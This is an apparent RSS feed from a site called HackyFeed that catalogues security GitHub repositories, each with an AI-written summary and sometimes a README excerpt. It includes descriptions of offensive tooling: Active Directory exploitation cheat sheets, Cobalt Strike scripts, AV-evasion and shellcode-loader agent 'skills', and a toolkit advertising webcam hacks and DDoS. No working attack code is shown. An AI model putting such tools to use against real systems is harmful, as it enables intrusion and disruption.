<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>HackyFeed</title><link>https://rainmana.github.io/hackyfeed/</link><description>Recent content on HackyFeed</description><generator>Hugo</generator><language>en-us</language><lastBuildDate>Mon, 30 Mar 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://rainmana.github.io/hackyfeed/feed.xml" rel="self" type="application/rss+xml"/><item><title>.github</title><link>https://rainmana.github.io/hackyfeed/tools/pretendonetwork-.github/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pretendonetwork-.github/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pretendo Network is a repository designed to support community collaboration by providing essential files and templates for contributors. Its primary use case includes establishing guidelines for licensing, security, and conduct within the community. Notable features include a structured contribution guide and established policies to ensure a cooperative and secure environment for development.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="pretendo-network"&gt;Pretendo Network&lt;/h1&gt;
&lt;p&gt;This special repository contains community files and common templates.&lt;/p&gt;
&lt;h2 id="contents"&gt;Contents&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="LICENSE"&gt;License&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=".github/SECURITY.md"&gt;Security Policy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=".github/CODE_OF_CONDUCT.md"&gt;Code of Conduct&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=".github/CONTRIBUTING.md"&gt;Contribution Guide&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>.NET-Deobfuscator</title><link>https://rainmana.github.io/hackyfeed/tools/notprab-.net-deobfuscator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/notprab-.net-deobfuscator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; .NET Deobfuscator is a comprehensive resource cataloging various open-source tools designed for the deobfuscation and unpacking of .NET applications. It serves as a centralized reference for developers needing to reverse-engineer obfuscated or packed .NET assemblies, featuring tools for numerous specific obfuscation methods such as Agile, Babel, and BoxedAppPacker among others. Notable features include linked resources for each tool, allowing for easier navigation and access to functionalities tailored for specific obfuscators.&lt;/p&gt;</description></item><item><title>.NET-Obfuscator</title><link>https://rainmana.github.io/hackyfeed/tools/notprab-.net-obfuscator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/notprab-.net-obfuscator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; .NET Obfuscator is a protection tool designed for .NET applications, aimed at preventing reverse engineering by transforming the original code into a format that is difficult to decipher. Its notable features include the ability to obscure intellectual property, enhance security against vulnerabilities, and reduce code size for improved application performance.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="net-obfuscator"&gt;.NET-Obfuscator&lt;/h1&gt;
&lt;blockquote&gt;
&lt;p&gt;.NET Obfuscator is a tool that is used to protect .NET applications from reverse engineering.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;This is done by &lt;strong&gt;transforming the original .NET code into a form that is difficult to understand&lt;/strong&gt;, making it hard for attackers to decompile the code and understand how it works.&lt;/p&gt;</description></item><item><title>31-days-of-API-Security-Tips</title><link>https://rainmana.github.io/hackyfeed/tools/inonshk-31-days-of-api-security-tips/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/inonshk-31-days-of-api-security-tips/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;31-days-of-API-Security-Tips&amp;rdquo; repository provides a comprehensive set of daily tips aimed at enhancing the security posture of APIs through practical advice and insights. It is primarily designed for penetration testers and developers to identify and mitigate common API vulnerabilities such as BOLA (IDOR), command injection, and mass assignment. Notable features include a structured format for presenting security tips, real-world exploitation techniques, and guidance on testing different API authentication mechanisms.&lt;/p&gt;</description></item><item><title>A-Red-Teamer-diaries</title><link>https://rainmana.github.io/hackyfeed/tools/ihebski-a-red-teamer-diaries/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ihebski-a-red-teamer-diaries/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; A-Red-Teamer-diaries is a collaborative repository containing publicly accessible notes and resources for penetration testing and red teaming activities, focusing on various tools and techniques employed during security assessments. Key features include a cheatsheet for quick command reference, detailed methodologies for effective exploitation, and practical scripts for network scanning and enumeration, enhancing both learning and efficiency in cybersecurity engagements. This tool serves as a practical guide for professionals aiming to improve their pentesting methodologies in controlled environments.&lt;/p&gt;</description></item><item><title>AboutSecurity</title><link>https://rainmana.github.io/hackyfeed/tools/wgpsec-aboutsecurity/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wgpsec-aboutsecurity/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AboutSecurity is a comprehensive security assessment tool that provides a variety of dictionaries and payloads tailored for penetration testing tasks. Its features include an extensive set of predefined dictionaries for different attack vectors, a range of skills related to reconnaissance, exploitation, and post-exploitation, as well as external tool integration for scanning and fuzzing, complemented by reference documentation for effective team collaboration.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="aboutsecurity"&gt;AboutSecurity&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Dic&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Auth : 认证字典
&lt;ul&gt;
&lt;li&gt;账号和密码。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Network : 网络
&lt;ul&gt;
&lt;li&gt;排除的私有 IP 段、本地 IP 段、dns 服务器列表。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Port : 端口字典
&lt;ul&gt;
&lt;li&gt;按照端口渗透的想法,将不同端口承载的服务可爆破点作为字典内容。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Regular : 规则字典
&lt;ul&gt;
&lt;li&gt;各种规则、排列的字典整理。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Web : Web 字典
&lt;ul&gt;
&lt;li&gt;web 渗透过程中出现的可爆破点作为字典内容。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Payload&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Burp&lt;/li&gt;
&lt;li&gt;CORS&lt;/li&gt;
&lt;li&gt;email&lt;/li&gt;
&lt;li&gt;Format&lt;/li&gt;
&lt;li&gt;HPP&lt;/li&gt;
&lt;li&gt;LFI&lt;/li&gt;
&lt;li&gt;OOB&lt;/li&gt;
&lt;li&gt;SQL-Inj&lt;/li&gt;
&lt;li&gt;SSI&lt;/li&gt;
&lt;li&gt;XSS&lt;/li&gt;
&lt;li&gt;XXE&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Skills&lt;/strong&gt; — AI Agent 技能方法论 (55 skills)
&lt;ul&gt;
&lt;li&gt;recon (5) : 侦察类 — 资产侦察、被动信息收集、子域名深挖、目标画像、社会工程&lt;/li&gt;
&lt;li&gt;exploit (26) : 漏洞利用类 — SQL 注入、XSS、SSTI、文件上传、反序列化、JWT、GraphQL、SSRF/XXE、CORS、CSRF、OAuth、WebSocket、竞态条件、缓存投毒/请求走私等&lt;/li&gt;
&lt;li&gt;ctf (5) : CTF 竞赛类 — Web 解题方法论、CTF 侦察、源码审计、Flag 搜索、Flag 校验&lt;/li&gt;
&lt;li&gt;postexploit (6) : 后渗透类 — Linux/Windows 后渗透、提权检查、凭据喷射、横向移动、持久化&lt;/li&gt;
&lt;li&gt;lateral (3) : 内网渗透类 — AD 域攻击、内网侦察、多层网络穿透&lt;/li&gt;
&lt;li&gt;cloud (2) : 云环境类 — 云元数据利用、IAM 权限审计与提权&lt;/li&gt;
&lt;li&gt;evasion (4) : 免杀对抗类 — C2 框架免杀、Shellcode Loader 生成、免杀技术整合、安全研究&lt;/li&gt;
&lt;li&gt;general (4) : 综合类 — 红队评估、移动后端 API、报告生成、供应链审计&lt;/li&gt;
&lt;li&gt;📊 &lt;strong&gt;Skill Benchmark&lt;/strong&gt;: &lt;code&gt;python scripts/bench-skill.py --all&lt;/code&gt; — A/B 测试 Skill 对 Agent 的实际效果&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tools&lt;/strong&gt; — 外部工具声明式 YAML 配置
&lt;ul&gt;
&lt;li&gt;scan : 扫描工具 (nmap, masscan)&lt;/li&gt;
&lt;li&gt;fuzz : Fuzz 工具 (dirsearch)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Doc&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Checklist&lt;/strong&gt; : 渗透测试过程中的检查项,杜绝少测、漏测的情况。&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cheatsheet&lt;/strong&gt; : 渗透测试信息收集表,渗透测试时直接复制一副作为参考、信息记录、方便团队协作、出报告等。&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;出报告专用&lt;/strong&gt; : 记录部分平常渗透测试遇到的案例。&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;行业名词&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="参考"&gt;参考&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/anthropics/skills/blob/main/skills/skill-creator/SKILL.md"&gt;https://github.com/anthropics/skills/blob/main/skills/skill-creator/SKILL.md&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/ljagiello/ctf-skills"&gt;https://github.com/ljagiello/ctf-skills&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/JDArmy/Evasion-SubAgents"&gt;https://github.com/JDArmy/Evasion-SubAgents&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Above</title><link>https://rainmana.github.io/hackyfeed/tools/caster0x00-above/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/caster0x00-above/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Above is a network security sniffer designed for penetration testers and security engineers to identify vulnerabilities in network equipment through traffic analysis. It operates silently, leveraging the Scapy library, and supports the detection of up to 28 protocols, including ARP, EAPOL, and various SCADA protocols. Users can operate it in &amp;lsquo;hot&amp;rsquo; mode for real-time sniffing or &amp;lsquo;cold&amp;rsquo; mode for analyzing pre-captured traffic dumps, with features like passive ARP detection and VLAN segment search.&lt;/p&gt;</description></item><item><title>Active-Directory-Exploitation-Cheat-Sheet</title><link>https://rainmana.github.io/hackyfeed/tools/integration-it-active-directory-exploitation-cheat-sheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/integration-it-active-directory-exploitation-cheat-sheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Active Directory Exploitation Cheat Sheet serves as a comprehensive resource for cybersecurity professionals, detailing methodologies and commands for navigating the Active Directory environment. Its primary use case involves facilitating reconnaissance, privilege escalation, and lateral movement within a network through structured commands using Powershell and .Net. Notable features include a systematic approach to various stages of the exploitation process, including domain enumeration, persistence techniques, and monitoring account vulnerabilities.&lt;/p&gt;</description></item><item><title>Active-Directory-Exploitation-Cheat-Sheet</title><link>https://rainmana.github.io/hackyfeed/tools/s1ckb0y1337-active-directory-exploitation-cheat-sheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/s1ckb0y1337-active-directory-exploitation-cheat-sheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Active Directory Exploitation Cheat Sheet serves as a comprehensive resource for security professionals, detailing various enumeration and attack techniques within Windows Active Directory environments. It encompasses methods for domain enumeration, local privilege escalation, lateral movement, and domain persistence, while providing actionable insights and references to essential tools such as PowerView, Mimikatz, and BloodHound. This tool is particularly notable for its structured approach to various exploitation vectors, facilitating an efficient and systematic exploitation process.&lt;/p&gt;</description></item><item><title>ADB-Toolkit</title><link>https://rainmana.github.io/hackyfeed/tools/ashwin990-adb-toolkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ashwin990-adb-toolkit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ADB-Toolkit is a comprehensive toolkit designed for testing and auditing Android Debug Bridge (ADB) configurations and vulnerabilities. Its primary use case lies in enhancing the security of Android devices by providing features such as device enumeration, file management, and installation of applications via ADB commands. Notable features include a user-friendly interface and extensive enhancements for common tasks associated with ADB, making it suitable for both developers and security researchers.&lt;/p&gt;</description></item><item><title>adbwebkit</title><link>https://rainmana.github.io/hackyfeed/tools/jxroot-adbwebkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jxroot-adbwebkit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ADB WebKit is a browser-based tool designed for managing Android devices via ADB (Android Debug Bridge) with an intuitive user interface. Its primary use case includes functionalities like application management (installing, uninstalling, granting permissions), shell access, screen capture, and device control commands, making it a comprehensive solution for developers and testers. Notable features include support for live application management, real-time screen interactions, and various device control options, all accessible through a USB connection or IP address.&lt;/p&gt;</description></item><item><title>AdminHack</title><link>https://rainmana.github.io/hackyfeed/tools/mishakorzik-adminhack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mishakorzik-adminhack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AdminHack is a script designed to identify admin login pages and assess potential EAR vulnerabilities across web applications by utilizing multi-threading and an extensive wordlist. It supports various web technologies, including PHP, ASP, and HTML, and includes features such as web crawling, custom path support, and results exportation to files. This tool is particularly useful for penetration testing and security assessments of web environments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;img width="99.9%" src="https://raw.githubusercontent.com/mishakorzik/mishakorzik.menu.io/master/img/AdminHackImg/IMG-adc29ed25806177260186a4fbdbe70c9-V.jpg"/&gt;
&lt;p align="center"&gt;
&lt;a href="mailto:developer.mishakorzhik@gmail.com"&gt;&lt;img title="Report bug" src="https://img.shields.io/badge/email-developer.mishakorzhik%40gmail.com-darkred?style=for-the-badge&amp;logo=gmail"&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik/AdminHack"&gt;&lt;img title="Version" src="https://img.shields.io/badge/Version-1.7.6-red?style=for-the-badge&amp;logo="&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik/AdminHack/blob/main/LICENSE"&gt;&lt;img title="License" src="https://img.shields.io/badge/License-GNU-red?style=for-the-badge&amp;logo=gnu"&gt;&lt;/a&gt;
&lt;a href=""&gt;&lt;img title="Python" src="https://img.shields.io/badge/Python-3.x-orange?style=for-the-badge&amp;logo=python"&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik"&gt;&lt;img title="Report" src="https://img.shields.io/badge/Copyring-2021-yellow?style=for-the-badge&amp;logo=github"&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik"&gt;&lt;img title="Autor" src="https://img.shields.io/badge/Author-mishakorzik-yellow?style=for-the-badge&amp;logo=github"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
• &lt;a href="https://github.com/mishakorzik/AdminHack/blob/main/LICENSE"&gt;License&lt;/a&gt; 
• &lt;a href="https://github.com/mishakorzik/AdminHack/issues"&gt;Issues&lt;/a&gt; 
• &lt;a href="https://github.com/mishakorzik"&gt;Developer&lt;/a&gt; 
• &lt;a href="https://github.com/mishakorzik/AdminHack/wiki"&gt;Wikipedia&lt;/a&gt; •
&lt;/p&gt;</description></item><item><title>afrog</title><link>https://rainmana.github.io/hackyfeed/tools/zan8in-afrog/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zan8in-afrog/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Afrog is a security tool designed for bug bounty programs, penetration testing, and red teaming efforts. It facilitates the creation and execution of Proofs of Concept (PoCs) to help security professionals identify vulnerabilities in systems. Notable features include a streamlined PoC writing guide, multi-language support, and a community-driven approach to contribute new exploit techniques.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;a href="http://afrog.net"&gt;&lt;img src="images/afrog-logo.svg" width="60px" alt="afrog"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;!-- &lt;/a&gt; &lt;h1 align="center"&gt;afrog&lt;/h1&gt; --&gt;
&lt;h4 align="center"&gt;A Security Tool for Bug Bounty, Pentest and Red Teaming&lt;/h4&gt;
&lt;p align="center"&gt;
 &lt;a href="README.md"&gt;English&lt;/a&gt; •
 &lt;a href="docs/README_CN.md"&gt;中文&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>agentic-radar</title><link>https://rainmana.github.io/hackyfeed/tools/splx-ai-agentic-radar/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/splx-ai-agentic-radar/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Agentic Radar is a security scanner specifically designed for analyzing agentic workflows, enabling users to identify vulnerabilities within their processes. Key features include Agentic Prompt Hardening, testing for vulnerabilities, and integration with CI/CD workflows, ensuring that security is maintained throughout the development lifecycle.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;a href="https://splx.ai"&gt;
 &lt;img src="https://github.com/splx-ai/agentic-radar/raw/main/docs/logo.png" alt="logo" width="600" height="auto" /&gt;
 &lt;/a&gt;
 &lt;p&gt;
 A Security Scanner for your agentic workflows!
 &lt;/p&gt;
&lt;!-- Badges --&gt;
&lt;p&gt;
 &lt;a href="https://github.com/splx-ai/agentic-radar/graphs/contributors"&gt;
 &lt;img src="https://img.shields.io/github/contributors/splx-ai/agentic-radar" alt="contributors" /&gt;
 &lt;/a&gt;
 &lt;a href=""&gt;
 &lt;img src="https://img.shields.io/github/last-commit/splx-ai/agentic-radar" alt="last update" /&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/splx-ai/agentic-radar/network/members"&gt;
 &lt;img src="https://img.shields.io/github/forks/splx-ai/agentic-radar" alt="forks" /&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/splx-ai/agentic-radar/stargazers"&gt;
 &lt;img src="https://img.shields.io/github/stars/splx-ai/agentic-radar" alt="stars" /&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/splx-ai/agentic-radar/issues/"&gt;
 &lt;img src="https://img.shields.io/github/issues/splx-ai/agentic-radar" alt="open issues" /&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/splx-ai/agentic-radar/blob/main/LICENSE"&gt;
 &lt;img src="https://img.shields.io/github/license/splx-ai/agentic-radar.svg" alt="license" /&gt;
 &lt;/a&gt;
 &lt;a href="https://pypi.org/project/agentic-radar"&gt;
 &lt;img src="https://img.shields.io/pypi/v/agentic-radar" alt="PyPI - Version" /&gt;
 &lt;/a&gt;
 &lt;a href="https://pypi.org/project/agentic-radar"&gt;
 &lt;img src="https://static.pepy.tech/badge/agentic-radar" alt="PyPI - Downloads" /&gt;
 &lt;/a&gt;
 &lt;br /&gt;
 &lt;a href="https://discord.gg/tR2d54utZc"&gt;
 &lt;img src="https://img.shields.io/discord/1346578514177949767?style=for-the-badge&amp;logo=discord&amp;logoColor=white&amp;label=Discord&amp;labelColor=5865F2&amp;color=555555" alt="Discord" /&gt;
 &lt;/a&gt;
 &lt;a href="https://join.slack.com/t/splxaicommunity/shared_invite/zt-31b3hc3mt-A0v78qztTIMSNBg6y~WOAA"&gt;
 &lt;img src="https://img.shields.io/badge/Slack-4A154B?style=for-the-badge&amp;logo=slack&amp;logoColor=white" alt="Slack" /&gt;
 &lt;/a&gt;
&lt;/p&gt;</description></item><item><title>AggressorScripts</title><link>https://rainmana.github.io/hackyfeed/tools/harleyqu1nn-aggressorscripts/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/harleyqu1nn-aggressorscripts/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Aggressor Scripts is a collection of scripts designed to enhance the functionality of Cobalt Strike, primarily aiding penetration testers and red teamers in executing various tasks more efficiently. Notable features include payload generation for different delivery methods, querying for installed antivirus solutions, and tools for detecting endpoint detection and response (EDR) solutions, all aimed at improving user experience and operational effectiveness during security assessments. Additionally, the repository serves as a resource for common OS commands and red teaming strategies, promoting collaborative improvement through community feedback.&lt;/p&gt;</description></item><item><title>ai-website-cloner-template</title><link>https://rainmana.github.io/hackyfeed/tools/jcodesmore-ai-website-cloner-template/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jcodesmore-ai-website-cloner-template/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The AI Website Cloner Template is a sophisticated tool designed to reverse-engineer any website into a modern Next.js codebase using AI coding agents. By pointing the tool at a target URL, it performs a comprehensive analysis to extract design tokens and assets, generate component specifications, and facilitate parallelized reconstruction of the site&amp;rsquo;s sections. Key features include support for multiple AI agents, a detailed multi-phase cloning pipeline, and compatibility with modern web technologies like Next.js and Tailwind CSS.&lt;/p&gt;</description></item><item><title>aleph</title><link>https://rainmana.github.io/hackyfeed/tools/alephdata-aleph/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alephdata-aleph/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Aleph is an open-source tool designed for indexing and searching large volumes of documents and structured data, primarily aimed at facilitating investigative reporting. Its notable features include the ability to cross-reference entities against various watchlists, enhancing the efficiency of data analysis for reporters and organizations engaged in investigative work. As of December 2025, the project is transitioning to a new platform, Aleph Pro, while transitioning support for the current version will continue until that date.&lt;/p&gt;</description></item><item><title>ALHacking</title><link>https://rainmana.github.io/hackyfeed/tools/4lbh4cker-alhacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/4lbh4cker-alhacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ALHacking is a versatile ethical hacking toolkit designed for conducting various cybersecurity activities, including social media and phone attacks, user discovery, and webcam hacks. Notably, it features a powerful DDoS attack tool and is compatible with Android (via Termux), Linux, and Unix operating systems. Users can easily install the toolkit by cloning the repository and running the installation script from the terminal.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;Author: 4lbH4cker&lt;/p&gt;
&lt;h3 id="version-4"&gt;Version 4&lt;/h3&gt;
&lt;p&gt;(&lt;img src="https://raw.githubusercontent.com/4lbH4cker/ALHacking/main/alhacking.png" alt="image"&gt;&lt;/p&gt;</description></item><item><title>AllHackingTools</title><link>https://rainmana.github.io/hackyfeed/tools/mishakorzik-allhackingtools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mishakorzik-allhackingtools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AllHackingTools is a penetration testing toolkit designed for Termux that automates the installation and management of various hacking tools. Its primary use case is to facilitate the setup and customization of a hacking environment on Termux, allowing users to quickly download and run tools directly from the interface. Notable features include an updated installer with enhanced design elements, streamlined updating capabilities, and improved system stability.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;img width="99.9%" src="https://raw.githubusercontent.com/mishakorzik/mishakorzik.menu.io/master/img/Logo/IMG-cd518796cb4b0527368a1b9dd67a8889-V.jpg"/&gt;
&lt;p align="center"&gt;
&lt;a href="https://github.com/mishakorzik/AllHackingTools"&gt;&lt;img title="Version" src="https://img.shields.io/badge/Version-2.7.4-yellow?style=for-the-badge&amp;logo="&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik/AllHackingTools/blob/main/LICENSE"&gt;&lt;img title="License" src="https://img.shields.io/badge/License-GNU-brightgreen?style=for-the-badge&amp;logo=gnu"&gt;&lt;/a&gt;
&lt;a href=""&gt;&lt;img title="Python" src="https://img.shields.io/badge/Python-3.8-red?style=for-the-badge&amp;logo=python"&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik"&gt;&lt;img title="Report" src="https://img.shields.io/badge/Copyring-2021-red?style=for-the-badge&amp;logo=github"&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik"&gt;&lt;img title="Autor" src="https://img.shields.io/badge/Author-mishakorzik-blue?style=for-the-badge&amp;logo=github"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
• &lt;a href="https://github.com/mishakorzik/AllHackingTools/blob/main/LICENSE"&gt;License&lt;/a&gt; 
• &lt;a href="https://github.com/mishakorzik/AllHackingTools/issues"&gt;Issues&lt;/a&gt; 
• &lt;a href="https://github.com/mishakorzik/AllHackingTools/projects"&gt;Project&lt;/a&gt; 
• &lt;a href="https://github.com/mishakorzik/AllHackingTools/wiki"&gt;Wikipedia&lt;/a&gt; •
&lt;/p&gt;</description></item><item><title>AlliN</title><link>https://rainmana.github.io/hackyfeed/tools/p1-team-allin/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/p1-team-allin/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ALLiN is a versatile penetration testing tool designed for lateral movement assessments within intranets, capable of handling a wide variety of target formats such as links and CIDR notations. Notable features include support for both Python 2.7 and 3.x, passive identification of web frameworks and components, extensive fingerprint data, and the ability to work across platforms when compiled with pyinstaller. It efficiently organizes scan results and offers multiple configuration options for targeting, threading, and reporting, making it a comprehensive solution for security professionals.&lt;/p&gt;</description></item><item><title>alternative-frontends</title><link>https://rainmana.github.io/hackyfeed/tools/digitalblossom-alternative-frontends/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/digitalblossom-alternative-frontends/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Alternative Frontends is a curated collection of privacy-respecting web applications designed as alternatives to mainstream social media services. It features a variety of lightweight, ad-free frontends that are open-source and self-hostable, catering to users looking for enhanced privacy without sacrificing functionality. Notable offerings include dedicated clients for platforms like YouTube and Reddit, each prioritizing user privacy and offering decentralized hosting options.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="alternative-frontends"&gt;Alternative Frontends&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://awesome.re"&gt;&lt;img src="https://awesome.re/badge.svg" alt="Awesome"&gt;&lt;/a&gt;
&lt;a href="https://github.com/digitalblossom/alternative-frontends/graphs/commit-activity"&gt;&lt;img src="https://img.shields.io/badge/Maintained%3F-yes-green.svg" alt="Maintenance"&gt;&lt;/a&gt;&lt;/p&gt;
